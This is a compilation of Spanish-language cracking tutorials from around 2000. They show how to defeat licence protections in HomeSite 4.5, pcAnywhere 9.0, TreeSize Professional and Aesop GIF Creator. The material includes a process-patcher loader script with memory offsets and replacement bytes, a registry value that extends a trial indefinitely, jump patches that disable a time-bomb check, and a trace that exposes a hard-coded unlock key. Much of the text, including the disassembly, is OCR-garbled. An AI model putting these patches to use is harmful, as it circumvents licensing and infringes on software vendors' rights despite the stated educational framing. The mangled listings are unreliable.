; creado con r!sc's process patcher 

; incluído a efectos didácticos. su empleo con software que no hayas obtenido legalmente es delito. 

t = 10000: 

; veces que va a intentar parchear. mejor empezar con 10000 e ir bajando hasta que falle 

; depende de las características del ordenador. a mí me funciona siempre así... 

o= homesite_loader.exe: ; nombre del ejecutable de salida 

f= homesite45.exe: ; nombre del proceso a parchear 

p=006a2c6f/75,05,e8,62/eb,05,e8,62: ¡cuarto parche de la nag de 30 días superados 


p=006afdc7/45,56,41,4c,55,41,54,49,4f,4e/52,45,47,49,53,54,45,52,45,44: ;tercer parche de evaluation version a 
registered version 


p=006b58b6/tf,92,cc,00,00,00/90,90,90,90,90,90: ¡segundo parche de la nag de about 


p=007057e5/74,16/eb,16::primer parche de las nag del inicio 


ahora lo guardamos como homesite_script.rpp en el directorio donde tengamos el rpp instalado y lo arrastramos 
encima de rpp.exe. si todo va bien nos sale un mensaje parecido a este: 


http: 22csir. cjb. net 


Thanks for using 1ISC's Process Patcher v1.5 
No problems creating Homesite_2.0.exe 


si sale cualquier otra cosa es que hay un error se sintaxis y tienes que revisar el script. además crea el archivo 
homesite_loader.exe de 5.50kb. copiamos este ejecutable al directorio del programa a parchear y ejecutamos el 


cargador. 


en el momento que ejecutamos, este indica al homesite45.exe que se ejecute, y mientras esto ocurre, hace un ataque a 
las posiciones de memoria indicadas parcheando lo que corresponda. el loader no sabe cuando el objetivo está 
descomprimido, pero como ataca continuamente las posiciones cumple su misión. si no es capaz de parchear al 
programa o en las posiciones de memoria no encuentra lo que le dijimos, saca un mensaje de error y el programa 
transcurre normalmente. 


estos mensajes pueden aparecer por cuatro causas principales: 


1, que haya errores de sintaxis. comprueba el valor de f, que el número de bytes a cambiar es igual que el de originales 
y que los separas por comas y barras 


2. que el valor de t sea muy bajo, en cuyo caso hay que aumentarlo (10000 da buenos resultados, menos depende del 
ordenador que tengas) 


3. que lo estes ejecutando en un directorio que no es el de la aplicación o que esta tenga el nombre cambiado. 


4. el número de bytes a parchear es superior a 180h (limitación del programa) 


resumiendo: 

el trabajo que tenemos que hacer con el homesite 4.5 es: 
1. deshacernos de las nags amarillas. 

2.deshacernos de la pantalla de caducidad. 

3.corregir el título de la ventana principal 

4.anular la ventana about. 


5. crear un cargador que haga todos los cambios anteriores durante el arranque del programa comprimido o parchear 
con el editor hexadecimal si nos sirve el ejecutable descomprimido. 


la mayor dificultad es que no disponemos de un listado muerto útil donde buscar strings, y que todo el proceso de 
rastreo se hace "in vivo". 


la segunda puerta: 


si recordáis, había hecho una búsqueda con el search and replace de la línea “evaluation version* y no la había 
encontrado. pues bien, sinembargo aparecieron unas claves del registro de windows muy curiosas: 


año ARA AE 


Replace with: | y] E 
File Mask: ['.exe +] E 
Path: [C:vArchivos de programa 4llaire*HomeSite 4.5 y] Ed 


Search Results: 

Offset 0x218b42 - TDFS Version a 

Offset 0x218f88 - Version 

Offset Ox24ac82 - SoftwarerMicrosoftWwindows:Currentyersion+rLocalStatusAS2324HE v 

Offset Ox24ad23 - >Software*Microsoftw'indowsCurrentWersion+LocalStatusA52324HE w 

Offset Ox24b042 - SoftwarerMicrosofttwindows+CurrentyersiontLocalStatusAS2324HE v El 

Offset Ox24b08b - >SoftwarerMicrosoftiw'indowsCurrentWersion+LocalStatusAS2324HE v 

Offset Ox24b9e6 - TiNew'Wersionávailable 

Offset Ox24ba13 - TíNewYWersionávailabled44d 

Offset Ox24ba33 - £ New'"Wersionáwvailable 

Offset Ox268b8e - SoftwarerMicrosoftwindows, Current ersion+Explorer,S hell Folders + 
» j 


HDD Ela 2 | 


MIA AS ES A A A altos Ermdararh Cll Eldar 


[Search h 


si utilizamos el regedit para ver que llamadas hace mientras se ejecuta, vemos que antes de que aparezcan las nags se 
hacen varias a localstatusrs232Mhev (¿homesite evaluation quizá?), igual que antes de que se cree la ventana de 
caducidad. curioso ¿no?. vamos a borrarla a ver qué pasa (primero exporta la clave por si acaso). pues ocurre que 
volvemos a tener 30 días de prueba. si volvemos a la clave del registro, aparece de nuevo hev y en ella un nuevo valor 
de cadena llamado dtst que vale 36677. a medida que avanzamos la fecha del ordenador el valor cambia hasta llegar a 
0, momento en el que el programa empieza a sacar la ventana de caducidad. si probamos a cambiar el valor por 
9999999 por ejemplo, nos da 9963352 días de evaluación :-). si no queremos liarnos con el loader hacemos un parche 
para el registro como el que sigue a continuación y listo : 


regedit4 
[hkey_current_userlsoftwarelmicrosoftwindowstcurrentversionVocalstatusrs232Mhev] 
"dtst"="9999999" 

con lo que la molesta pantalla de caducidad no sale nunca. 


si quieres busca la rutina que llama a la clave y parchea la comprobación, pero esto es más fácil. 


adios... 


bueno, espero no haberme liado demasiado al explicar cómo se desprotege este programa y que la lectura haya sido 
amena. sobre archivos empaquetados hay muchos tutoriales y muy buenos en el ecd y otros sitios. en vez del loader se 
podría haber hecho un recorte con el snippet creator e inyectárlo al ejecutable original, ya que el e.p original ya lo 
sabemos gracias al archivo descomprimido y sólo habría que buscar dónde meterlo y dirigir la llamada a él para que 
tomara el control, pero eso es ya otra historia... saludos a todos y hasta la próxima. 


todo lo mostrado en este tutorial es para uso educativo y no para fomentar la piratería. si tienes pensado utilizar este 
programa más de los 30 días de evaluación cómpralo. 


no me hago responsable del mal uso de los contenidos de este documento. 
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Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Symantec pcAnywhere v9.0 


Bomba de tiempo que explota en 30 días 
Simular Estar Registrados 


pcAnyware es una utilidad de acceso remoto a otros ordenadores, que permite 
conexiones directas, vía módem o través de una red. Bastante útil si tienes 
uno o más ordenadores y quieres conectarlos rápidamente en una "minired". 


Principiante + 


http://www.symantec.com 


Wdasm 8.9, Softice 4.5, UltraEdit32 6, TRW2000 (opcional) 


BugSys FECHA: 22/10/00 


introduccion 


en esta ocasión nuestra víctima será pcanyware, de la empresa symantec, famosa por las utilidades norton y 
algunas cosas más. pcanyware es una utilidad de acceso remoto a otros ordenadores, que permite conexiones 
directas, vía módem o través de una red. bastante útil si tienes uno o más ordenadores y quieres conectarlos 
rápidamente en una "minired". 


al atake 


primera aproximación: 


un primer vistazo al programa con los típicos regmon y filemon no dan demasiada información, 
se pueden monitorizar tres ejecuciones, la primera, una antes de caducar, y la de caducidad, 
por si pone alguna marca en algún archivo o en el registro de windows. tras comparar los 
tres registros con excel se ve que la única vez que escribe algo en el registro es cuando 
caduca el programa , además de un fichero en c:windowslapploglY. la clave de registro que se 
cambia es un poco extraña: 

hkcrYclsidl [ 9bb8b204-17b0-11d0-bdf9-0020a£f3743f6)Mbuffseticache. 

en principio parece que es alguna tontería de windows y su Caché, pero más adelante veremos 


que no es así. 


aproximación en vivo 

bueno... pues vamos a ver por donde le podemos entrar a esta preciosidad... ejecutamos el 
programa y nos sale una pantalla que nos recuerda que el programa está caducado y una lista 
de teléfonos para encargar la versión completa. empecemos por aquí con el winice cargado 


hacemos un hwnd, 


que nos da información de todas las ventanas que hay en pantalla y el 


programa al que pertenecen. buscando por winaw32 encontramos un dialog con un botón y nos 


fijamos en el handle... ahora lo que tenemos que hacer es poner un breakpoint en el momento 


que se destruye y ver de dónde viene... sencillo: 

bmsg /handle/ wm_destroy 

tras unos pocos f12 caemos en una dll llamada awcomm32.d11, qu s dónde se genera la 
ventana, y después en el ejecutable, donde se ve la llamada a la rutina checktimebomb d 
awcomm32.d11 (bonito nombre para una función... además de ilustrativo). 


veamos: tenemos una dll con una función llamada checktimebomb que es la que genera la nag y 
hace que salgamos del programa. si nos fijamos en los registros del sice, al salir de la dll 
tenemos eax = 0. vamos a ver si hay un flag por aquí... ponemos un bpx en la entrada a la 
función y al salir pinchamos en el valor de eax y lo hacemos igual a 1. f5 y ¡bingo! el 
programa funciona. 


* referenced by a (u)nconditional or (c)onditional jump at address: 
| :004060£9 (c) 


:00406111 57 push edi 


* reference to: awcomm32._timebombcheckQ4, ord:00chbh 

:00406112 £f1524814500 call dword ptr [00458124]<- de aquí hay que salir con eax=1 
:00406118 85c0 test eax, eax 

:0040611a 7509 jne 00406125 

:0040611c 5f pop edi 

:0040611d 5e pop esi 

:0040611e 81c498000000 add esp, 00000098 

:00406124 c3 ret 


1. de la llamada a awcomm32 hay que salir con eax=1. 

ahora sólo habría que anular la llamada y escribir mov eax,01 rellenando con los nops 
necesarios para mantener el numero de bytes. prueba... funciona ¿no?. 

intenta hacer alguna conexión.... ¡te pillé!, el desgraciado no funciona y nos vuelve a 
salir la pantalla de fin de evaluación. lo que hemos hecho es modificar sólo uno de los 
ejecutables que conmponen el programa. lo que primero se le ocurre a uno es trazar todos los 
ejecutables y hacer que a la salida de awcomm32._timebombcheck siempre eax valga 1 o 
cambiando el salto condicional (si lo hubiera). bueno... si no tienes otra cosa mejor que 
hacer serviría, pero sería mejor mirar la dll y modificarla, ya que la función está ahí 
dentro y cada vez que sea llamada ya daría el valor eax=1 a la salida.. 


si echamos un vistazo al desensamblado de awcomm32.dl1, vemos que los nombres de las 
funciones son muy ilustrativas :-). lo que más me ha llamado la atención es una bifurcación 
en el código, ya que parece que la dll puede distinguir si es una versión legítima ( va por 
is custom??purchasedver..... ) o la demo shareware (is custom?? timebombver....). la nuestra 
es la timebombeada :-p... así que tendremos que ver por dónde se mete y dónde se determina 
que eax valga 0ó l a la salida. 

se podría tratar de mirar dónde se elige purchasedver o timebombver, pero lo que me interesa 
ahora es eax y no si he pagado o no por el programa. 

la parte interesante de la dll es la siguiente: 


* reference to: iscustom. ?timebombverftctbombcachelflgaexaag0lz, ord:0011h 
:67ea3a142 ff15e400eb67 call dword ptr [67eb00e4] 
:6l1ea3a18 33c0 xor eax, eax 

:67eal3ala 8b4c2434 mov ecx, dword ptr [esp+34] 
:67ea3ale 8b542418 mov edx, dword ptr [esp+18] 
:67ea3a52 66alee8eeb67 mov ax, word ptr [67eb8eee] 
:67ea3a58 8lel1ffff0000 and ecx, 0O000ffff 

:67ea3a5e 51 push ecx 

:67eaB3a5f 8le2ffff0000 and edx, 0O000ffff 

:6lea3a65 33c9 xor ecx, ecx 

:67ea3a67 52 push edx 

:67ea3a68 668b0dec8eeb67 mov cx, word ptr [67eb8eec] 
:67ea3a6f 50 push eax 

:67ea3a70 51 push ecx 

:671ea3a71 e82afcffff call 67ea36a0 

:67ea3a76 83f8ff cmp eax, ffffffff 

:67ea3a79 0f8492010000 je 67ea3c11 <- cuidadín 
:6leaB3a7f 85c0 test eax, eax 

:67ea3a81 745a Je 67eaB3add <- cuidadín 

:67ea3a83 83f801 cmp eax, 00000001 


:67ea3a86 7427 Je 6leaB3aaf <- cuidadín 


* referenced by a (u)nconditional or (c)onditional jump at address: 
| :67ea3a32 (c) 


:67ea3a88 8d4c241c lea ecx, dword ptr [esp+lc] 


* reference to: iscustom.??1ctbombcachellqaebxz, ord:0002h 
:67ea3a8c ff15c800eb67 call dword ptr [67eb00c8] 

:67ea3a92 8b542414 mov edx, dword ptr [esp+14] 

:67ea3a96 8b442410 mov eax, dword ptr [esp+10] 

:67ea3a%a 5f pop edi 

:67ea3a9% 5e pop esi 

:67ea3a9c 894204 mov dword ptr [edx+04], eax 

:67eaB3a9f 5d pop ebp 


* possible reference to string resource id=00001: "no se ha podido cargar un componente 
(Ss). vuelva a instalar" 

:67ea3aa0 b801000000 mov eax, 00000001 <-esto nos hará el trabajito... :-) 

:67ea3aab 5b pop ebx 

:67ea3aab 81c408020000 add esp, 00000208 

:67ea3aac c20400 ret 0004 <-eax=1 a la salida... jJe..]Je.. 


2. en 67ea3aa0 hacen el trabajo por nosotros.... y salimos con eax= 1 

lo que nos interesa es que llegue a la intrucción en 6/ea3aa0 siempre, que es lo que ocurre 
en el periodo de evaluación y hace que a la salida eax= 1l. sin entrar en más explicaciones 
que las notas al código, se ve que hay que anular los saltos en 3a79, 3a81l y 3a86. pues 
eso... con los offset se va al ultraedit y se parchea. el pcanyware queda listo para una 
óptima evaluación. 


y qué pinta en todo esto aquella clave de registro tan rara. pues para empezar el nombre 
ahora ya nos dice algo.... caché (tbombcache), además, si buceamos un poco en las llamadas 
que hay en esta función, hay accesos a esa clave, tanto en lectura como escritura. la clave 
que nos parecía una chorrada del windows resultó ser el detonador de una bomba de tiempo que 
hace Caducar al programa. para desactivarla sólo hay que cortar los cables verde, azul y 
amarillo y listo.... ya no explotará nunca más. 
para trazar las llamadas que menciono arriba, recomiendo el trw2000, que nos da el nombre de 
la función llamada además del offset del call. nada mas entrar en la función desde el 
ejecutable, verás las llamadas a readfile para comprobar si es la versión demo o la 
comprada, además de las llamadas de apertura , escritura y cierre a la clave del registro 
que contiene el detonador, como véis un monton de sitios que se podrían usar para entrar. 

lo bueno de trazar con el trw es que vemos en todo momento lo que ocurre sin necesidad de 
romperse mucho la cabeza y sin necesidad de desensamblar. feliz buceo.... 


recordad que si vais a utilizar este programa deberéis comprarlo. 


las acciones aquí descritas lo son con fines educativos. su puesta en práctica va en contra de la ley de derechos de autor y está penado. 


bugsys - septiembre de 2000 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: TreeSize profesional 2.2 

PROTECCION: “Nag” molesta 

Objetivo: Quitar la 'nag” y las referencias a 'UNREGISTERED'” 

Descripcion: Información del espacio libre en el disco 

Dificultad: PRINCIPIANTE 

DOWNLOAD : http://www. jam-—-software.com/treesize.html 

Herramientas: Softice, Hex Workshop (Editor Hexadecimal) 

CRACKER: Perico FECHA: 22/10/00 
introduccion 


este programa es una utilidad para el disco. 


en un principio parece que no tiene ninguna limitación, pero al cabo de un numero de usos al salir del 
programa nos aparece una “nag” pidiendo que nos registremos. 


TreeSize Professional 


vamos a quitar esta nag” y todas las referencias a unregisterd para dejar el programa “mas mono”. 


al atake 


ejecuta el programa una primera vez para que cree las entradas necesarias en el registro. ahora lanzamos el programa 
techfact98 y ejecutamos el treesize para ver que cambios se producen. 


7 TechFacts 98 11m] E 
File Edit ¿Action Email 'W'indow Help 


XNCOBAOVIAAR ADAN 


Monitor | Spy | System | Action Tools | intemet | Contig | Search | Network | Tweak | Inspect 8: Clean | 


s Type of System W'atch 
Watch System 
E Al land 32-bit Windows Executable 
> Moveltl (+ Run this program: [C:sutlidadsT reeSize Professional 2.24 T sizepro.exe E 
Ez DiskUsage | ¡7 watch Contents of INI files: CAWINDOW'SYWIN.INI g 
Software Versions C-0WINDOWSISYSTEM.INI Pr 
File Associations [4 Watch Registry g 


IV Watch Disks: 
Bar | añ 


E lc | YES —cA hd 
[Y Continue watch even if your system reboots... 


Y So 


13:03:51 | 


“tools” -> “watch system” -> “run this program” -> “go” 
cuando salga el programa treesize sales de él para que haga las comparaciones. 


después de un rato vemos que entre otras cosas hay estas modificaciones: 


Registry key values changed: [6] 

HKEY_USERSA.DEFAULTA Softwares JAM Software. TreeSize Professional 

Walue "ClstrSize"": from "26" to "39" 

HKEY_USERSA.DEFAULTA Software Network Associates TWDMcáfee VirusScan Current ersioniS cl 
Walue "wLastExec"": from '"18677760" to "188743689" 

HKEY_CURRENT_USER Software 4M Software, TreeSize Professional 

Walue "ClstrSize"": from "26" to "39" 


si volvemos a realizar el proceso vemos que el valor de la clave “clstrsize” ha vuelto a cambiar. es el valor de esta clave 
el que hace que aparezca la 'nag”. lo puede comprobar ejecutando el programa y mirando en el registro el valor de la 
clave. va aumentando su valor sumándole 13 (13,26,39,52,65,...,,169,...,273). al llegar a este valor aparece la 'nag”. 


nuestro objetivo es hacer que este valor no aumente. 


para hacerlo entramos en el “symbol loader” del softice y le decimos que ejecute nuestro programa. cuando rompa en 
nuestro programa le pondremos un breakpoint. el siguiente breakpoint (gracias a mr. nobody y a su coc2000) hace que 
el sice rompa cada vez que se quiere acceder a una clave del registro que empiece por'clst” (solo puedes poner 4 letras 
como máximo). 


bpx regqueryvalueexa if *(esp->8)=="clst' 


lo escribimos y le damos a “ctrl-c”. la primera ve rompe en --- advapi ---, le damos a f5 y vuelve a romper, esta vez 
entreesize, le volvemos a dar a f5 tres veces más. y la tercera vez rompe en: 


100474142 SB45FC mov eax, dword ptr [ebp-04] 
200474145 ESIAFDFFFF call 00473E64 

:0047414C 741C je 00474164 

:0047414E SD4DEC lea ecx, dword ptr [ebp-14] 
:00474151 SBD6 mov edx, esi 

200474153 8B45FC mov eax, dword ptr [ebp-04] 
:00474156 ESSDFEFFFF call 00473098 

:0047415B SBD3 mov edx, ebx 


ahora ha roto en la instrucción :0047415, a continuacion hay un salto je 0047416 que el sice nos dice que no se 
produce. consideré este salto como sospechoso la primera vez que lo vi y por eso decidí forzarlo. si lo forzamos en el 
sice con 


rfiz 


vemos que el valor de la clave *clstrsize” vuelve a su valor inicial (es decir 13) 


para hacer permanente, abrimos nuestro editor hexadecimal y buscamos la cadena *84c0741c8d6dec”. una vez 
encontrada cambiamos el 74 por 75 con lo que invertimos el salto haciendo que se produzca. también podemos 
convertir el 741c en eb1c que equivale a jmp, es decir que salte siempre. da igual hacer el cambio que prefiráis. 


una vez hecho, salvamos el programa con el cambio realizado y vemos que al ejecutar el programa el valor de 
“esltrsize” no cambia nuca por lo que no nos volverá a aparecer la “nag”. 


si somos de las personas (me incluyo) a las que les molesta que nos recuerden que estamos unregistered, es muy 
fácil quitarlo. volvemos al editor hexadecimal y lo buscamos como text string y nos aparece como: 


(unregistered) -> 28554e5245474953544552454429 


ahora cambiamos el 28 por 00 (o toda la cadena por nuestro nombre o lo que queramos, teniendo cuidado de no 
sobrepasar el tamaño de (unregistered)). este cambio le indica que la cadena ha terminado por lo que no se mostrara. 


seguimos buscando y cambiando. la cadena nos aparece una vez mas en la que volvemos a realizar el mismo cambio. 


pd: he comprobado que las versiones posteriores de este programa (las versiones 2.30 y 2.31) tienen esta misma 
protección. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Aesop GIF Creator v1.00.215 


Protección: Unlock Key 


Descripción: Utilidad para crear GlFs animados 


Dificultad: Facililla 


Download: http: //www.yukudr.com/software 


Herramientas: Softl CE 


Cracker: MeGaBiTe 12/10/2000 


introducción 
extraído de la ayuda del propio programa. 


["aesop" es una potente herramienta que le permite crear increíbles imágenes gif publicitarias 
(banners, botones, líneas, etiquetas, fondos, encabezados para sitios webs, etc.), que contienen 
carcterísticas propias de sofisticadas calidades de estudio, efectos especiales, fuentes 3d y 
manipulación de imágenes. se pueden realizar maravillosos efectos visuales (por ejemplo, 
desplazamiento de texto a través de la imágen) en ficheros gif multi-frames en unos pocos minutos. 
la optimización de la paleta y la compresión de datos le proporcionan la posibilidad de obtener gifs de 
pequeño tamaño. la simplicidad y comodidad de su interface hacen que éste programa sea útil tanto 
para los programadores experimentados como para quienes empiezan en el diseño gráfico.] 


he estado buscando por la ayuda y no pone nada sobre limitaciones, períodos de evaluación, etc. 
cabe suponer, en consecuencia, que para registrarnos lo único que debemos hacer es introducir el 
'unlock key' correcto. bien, ¡vamos a éllo! 


una vez instalado el programa vamos al menú 'help' y seleccionamos la opción 'registration'. esto hará que se 
nos abra la ventana 'register me!'. podemos verla aquí abajo: 


To obtain unlock key you must fill in the On-line Order Form 
or send us the Order Form by tax: +1 (775)-418-6895 


On-line Order Form: http: 2www. yukudr corn ¿software 


Fax Order Form: Print Fax Order Forrn 


Registration 
YourlDis:  2608-62355-L 


Unlock key: | 
| considerto register later | 


bien podemos ver aquí que se nos proporciona un 'id' y se nos pide que introduzcamos un 'unlock key”. 
pudiéramos suponer que éste 'id' se genera aleatoriamente en el proceso de instalación del software y variará 
tanto en cada instalación como en cada equipo en el que se instale el programa. ¡es lo razonable! bien, ¡pues 
no! lo he instalado y reinstalado varias veces en el mismo equipo y en equipos diferentes y, ¡siempre nos 
proporciona el mismo 'id'! bueno, ésto hace que nuestro trabajo sea más sencillo. 


Eontitm una key 


intentamos registrarnos con un 'unlock key' falso: digamos 'u1193046'. pulsamos el botón 'confirm unlock 
key'. se nos aparece ésta 'ventanita': 


Aesop 


ES Invalid unlock key. 


¡¡¡toma ya!!! ¿un mensaje de error? ¡¡¡imposible!!! ¡¡¡vamos a ver qué ocurre!!! 


vamos a poner un breakpoint y entrar al código del programa. la función api que funcionará aquí (y en casi 
cualquier programa) es 'hmemcpy". 


antes de establecer nuestro breakpoint en softice deberemos abrir nuestra ventana 'register me!' y escribir un 
'unlock key' falso. debemos hacerlo así ya que si establecemos el breakpoint antes, softice hará break en 
cada uno de los carácteres que introduzcamos en el campo 'unlock key', ya que se llama a ésta función cada 
vez que se introduce un carácter. 


bien, por lo tanto una vez que hayamos introducido nuestro 'unlock key" falso pulsamos ctrl-d para 
cambiarnos a softice y en la ventana 'command!' escribimos "bpx hmemcpy”, con lo que ya tenemos 
establecido nuestro breakpoint. pulsamos f5 para regresar a nuestra 'criaturita' y pulsar el botón 'confirm 
unlock key'. lo hacemos así y softice hará break; ahora pulsamos f12 hasta que lleguemos al código del 
programa. para identificar que estamos en el código apropiado deberemos ver en la línea superior a la 
ventana command del softice algo como 'aesop!code+0002670d'. una vez lleguemos aquí deberemos, no 
obstante, seguir pulsando f12 para volver de los diferentes 'ret' y llegar de éste modo a la parte del código 
que realmente nos interesa. es la siguiente: 


0177:0048d4bd call 0042e320 


0177:0048d4c2 mov edx, [ebp-0104] >aterrizamos aquí 
0177:0048d4c8 lea eax, [ebp-0100 
0177:0048d4ce mov ecx,000000ff 
0177:0048d4d3 call 00403f4c 
0177:0048d4d8 lea edx, [ebp-0100 
0177:0048d4de mov eax, [00498654 
0177:0048d4e3 mov eax, [eax] 
0177:0048d4e5 call 00495124 
0177:0048d4ea mov eax, [00498654 
0177:0048d4ef mov eax, [eax] 
0177:0048d4f1 cmp byte ptr [eax+0007fb71],fb 
0177:0048d4f8 jnz 0048d590 

0177:0048d4fe mov dl,01 
0177:0048d500 mov eax, [0048b680] 


bien, traceamos nuestro código pulsando f10 hasta llegar a la instrucción 'call 00495124' en la posición 
'0048d4e5'. una vez tengamos el cursor en ésta instrucción vamos a ver qué tenemos dentro. para éllo 
pulsamos f8 y nos encontraremos con el siguiente código: 


0177:00495122 3jns 00495124 

0177:00495124 push ebp >aterrizamos aquí 
0177:00495125 mov ebp, esp 

0177:00495127 add esp, fffffef4 

0177:0049512d push ebx 

0177:0049512e push esi 

0177:0049512f push edi 

0177:00495130 xor ecx,ecx 

0177:00495132 mov [ebp-0104],ecx 

0177:00495138 mov [ebp-0108],ecx 

0177:0049513e mov [ebp-010c],ecx 

0177:00495144 mov esi,edx 

0177:00495146 lea edi, [ebp-0100] 

0177:0049514c xor ecx,ecx 

0177:0049514e mov cl, [esi]l >pone la longitud de nuestro 
>unlock key falso en cl 


0177:00495150 inc ecx 

0177:00495151 repz movsb >copia el unlock keyfalso a 
>otra posición (lo copia con la 
>longitud en el primer byte de 
>la cadena, tal como se 
>gestionan las cadenas en 
>pascal) 


0177:00495153 mov ebx,eax 

0177:00495155 xor eax,eax 

0177:00495157 push ebp 

0177:00495158 push 004951f7 

0177:0049515d push dword ptr fs: Í[eax] 

0177:00495160 mov fs: [eax],esp 

0177:00495163 mov byte ptr [ebx+0007fb71],00 

0177:0049516a lea eax, [ebp-0104] 

0177:00495170 lea edx, [ebp-0100] >pone el unlock key falso en 

>edx (todavía con la longitud 

>en el primer byte) 

0177:00495176 call 00403£14 >este call copia el unlock 
>key falso ya sin el byte de 
>longitud del principio en una 
>posición de memoria 

0177:0049517b mov eax, [ebp-0104] >y guarda ésa posición de 

>memoria en eax 

0177:00495181 push eax >y envía el unlock key falso 

>a la pila 


0177:00495182 lea eax, [ebp-010c] 

0177:00495188 push eax 

0177:00495189 mov ecx,00000006 

0177:0049518e mov edx,00000004 

0177:00495193 mov eax,00495210 >pone en eax esa constante; si 
>hacemos un "d 00495210" para 
>ver qué tenemos en ésa 


>posición, veremos que contiene 
>una extraña cadena: 
>'mtxmrpntltl' 
0177:00495198 call 00404178 >este call lo que hace es 
>extraer la subcadena 'mrpntl' 
>de la cadena anterior 
0177:0049519d mov eax, [ebp-010c] >y guarda la dirección de dicha 
>subcadena en eax 
0177:004951a3 lea edx, [ebp-0108] 


0177:004951a9 call 00408£20 >este call pasa la subcadena a 
>mayúsculas 

0177:00495lae mov edx, [ebp-0108] >y guarda nuevamente la 
>dirección de la subcadena en 
>edx 

0177:004951b4 pop eax >y recupera nuestro unlock 


>key falso de la pila. con 
>lo cual tenemos la dirección 
>de nuestro unlock key falso 
>en eax y la dirección de una 
>cadena sospechosa en edx. si a 
>ella añadimos las dos 
>instrucciones que siguen, que 
>son típicas, la situación es 
>harto crítica. 

0177:004951b5 call 00404080 >tenemos que examinar éste call 

0177:004951ba jnz 004951d2 

0177:004951bc xor edx, edx 

0177:004951lbe mov eax, [ebx+00000478] 

0177:004951c4 call 0043ebb4 

0177:004951c9 mov byte ptr [ebx+0007fb71],fb 

0177:004951d0 jmp 004951d9 


bien, no nos queda más remedio que examinar qué hace la instrucción 'call 00404080'. para éllo, como 
hemos hecho anteriormente, cuando el cursor se encuentre sobre ésa instrucción pulsamos f8 para tracear el 
procedimiento. nos encontraremos con el siguiente código: 


0177:0040407d lea eax, [eax+00] 

0177:00404080 push ebx >aterrizamos aquí 

0177:00404081 push esi 

0177:00404082 push edi 

0177:00404083 mov esi,eax 

0177:00404085 mov edi, edx 

0177:00404087 cmp eax, edx >compara el registro eax con edx 

0177:00404089 3jz 0040411e >si no son iguales, salta 

0177:0040408f test esi,esi >comprueba si hemos introducido 
>algo 

0177:00404091 3z 004040fb >si no hemos introducido nada, 
>salta 

0177:00404093 test edi,edi >¿comprueba si hay algo en 
>nuestra sospechosa subcadena? 

0177:00404095 3z 00404102 >si está vacía, salta 

0177:00404097 mov eax, [esi-04] >pone la longitud de nuestro 
>unlock key en eax 

0177:004040%9a mov edx, [edi-04] >pone la longitud de nuestra 
>subcadena en edx 

0177:004040%9d sub eax,edx >resta las longitudes 

0177:0040409f ja 004040a3 >si la nuestra es de mayor 


>longitud, salta; la longitud del 
>unlock key que introduzcamos 
>deberá ser 6 


0177:004040a1 add edx,eax >suma los registros eax y edx; 
>como eax será 0, edx permanece 
>inalterado 

0177:004040a3 push edx >envia el valor de edx a la pila 

0177:004040a4 shr edx,02 >hace un desplazamiento binario 


>de 2 bits a la derecha, con lo 
>que edx será igual a 1 


0177: 


0177: 


0177: 


0177: 


0177: 
0177: 


0177: 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177 
0177: 
0177: 
0177: 


0177: 


0177: 
0177: 
0177: 
0177: 


0177: 


0177: 


0177: 
0177: 


0177: 
0177: 


0177: 
0177: 


0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 
0177: 


0177: 


004040a7 


004 


004 


004 


004 
004 


004 


004 
004 
004 
004 
004 
004 
004 
004 
004 
004 


004 
004 
004 
004 


004 


004 


004 


004 


004 


004 
004 


004 
004 


004 
004 
004 
004 
004 
004 
004 
004 
004 
004 


004 


04 


04 


04 


04 
04 


04 


04 
04 
04 
04 
04 
04 
04 
04 
04 
04 


04 
04 
04 
04 


04 


04 


04 


04 


04 


04 
04 


04 
04 


04 
04 
04 
04 
04 
04 
04 
04 
04 
04 


04 


0a9 


0ab 


Dad 


Daf 
0b1 


0b2 


0b4 
0b7 
Oba 
Obc 
Obe 
0cl 
0c4 
0c5 
0c7 
0c9 


Occ 


Ocf 
0d0 
0d3 
0d5 


0d7 


0d9 


0db 
Odd 


Ode 
0e0 


0e2 
0e4 


0e5 
0e7 
0ed 
0f3 
0f5 
0f7 
0f9 
0Ofb 
Ofe 
100 


102 


jz 004040cf 


mov 


mov 


cmp 


jnz 
dec 


ecx, [esi] 


ebx, [edi] 


ecx, ebx 


00404109 
edx 


jz 004040c9 


mov 
mov 
cmp 
jnz 
add 
add 
dec 
jnz 
jmp 
add 


add 


pop 
and 


ecx, [esi+04] 
ebx, [edi+04] 
ecx, ebx 
00404109 
esi,08 
edi,08 

edx 
004040a9 
004040cf 
esi,04 


edi, 04 


edx 
edx,03 


3z 004040£7 


mov 


mov 


cmp 


jnz 
dec 


ecx, [esi] 


ebx, [edi] 


cl,bl 


0040411e 
edx 


3z 004040£7 


cmp 


jnz 
dec 


ch, bh 


0040411e 
edx 


3z 004040£7 


and 
and 
cmp 
jnz 
add 
jmp 
mov 
sub 
jmp 


mov 


ebx,00ff0000 
ecx,00ff0000 
ecx, ebx 
0040411e 
eax, eax 
0040411e 
edx, [edi-04] 
eax, edx 
0040411e 


eax, [esi-04] 


>si el resultado del 
>desplazamiento es cero, salta; 
>si la longitud del unlock key es 
>6, no saltará 

>pone los cuatro primeros 
>caracteres del unlock key falso 
>en el registro ecx 

>pone los cuatro primeros 
>caracteres de nuestra sospechosa 
>subcadena en el registro ebx 
>compara los dos conjuntos de 
>cuatro caracteres 

>si no son iguales, salta 
>decrementa edx, con lo que es 
>igual a 0 

>en consecuencia, salta. 
>¡estupendo, vayamos allá! 


>suma 4 al registro esi, con lo 
>cual éste apunta al quinto 
>carácter del unlock key falso 
>hace lo mismo con nuestra 
>subcadena sospechosa 


>pone los dos últimos caracteres 
>del unlock key falso en ecx 
>hace lo mismo con los dos 
>últimos caracteres de nuestra 
>subcadena sospechosa 

>compara el quinto carácter del 
>unlock key falso con el quinto 
>carácter de la subcadena 

>si no son iguales, salta 
>decrementa edx, que es el 
>registro que lleva la cuenta de 
>los caracteres que faltan por 
>comparar: edx se pone a 1 ya que 
>sólo nos queda un carácter a 
>comparar 

>¿hemos terminado? 
>compara el secto carácter del 
>unlock key falso con el sexto 
>carácter de la subcadena 

>si no son iguales, salta 
